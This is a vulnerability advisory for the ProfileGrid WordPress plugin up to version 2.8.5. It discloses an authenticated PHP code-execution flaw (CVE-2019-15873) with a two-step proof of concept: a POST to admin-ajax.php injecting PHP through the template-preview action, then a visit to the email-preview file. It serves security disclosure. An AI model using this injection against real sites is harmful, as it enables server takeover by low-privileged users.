ProfileGrid – User Profiles, Groups and Communities <= 2.8.5 - Authenticated Code Execution



Description
The plugin ProfileGrid – User Profiles, Groups and Communities versions prior to 2.8.6 is vulnerable to Arbitrary Code Execution. An authenticated user with a role as low as Subscriber can execute arbitrary PHP code on websites using the plugin. 
Proof of Concept
Send an authenticated POST request to wp-admin/admin-ajax.php with parameters action=pm_template_preview&html=<?php phpinfo();

Visit wp-content/plugins/profilegrid-user-profiles-groups-and-communities/admin/partials/email-preview.php

Affects Plugin

References

CVE 2019-15873
URL https://plugins.trac.wordpress.org/changeset/1877071/

Classification

Type RCE
OWASP Top 10 A1: Injection
CWE CWE-94

Miscellaneous

Submitter Karim El Ouerghemmi
Submitter Website https://ripstech.com
Submitter Twitter ripstech
Views 6128
Verified No
WPVDB ID 9086

Timeline

Publicly Published 2018-05-18 (over 1 year ago)
Added 2018-05-18 (over 1 year ago)
Last Updated 2019-11-01 (13 days ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin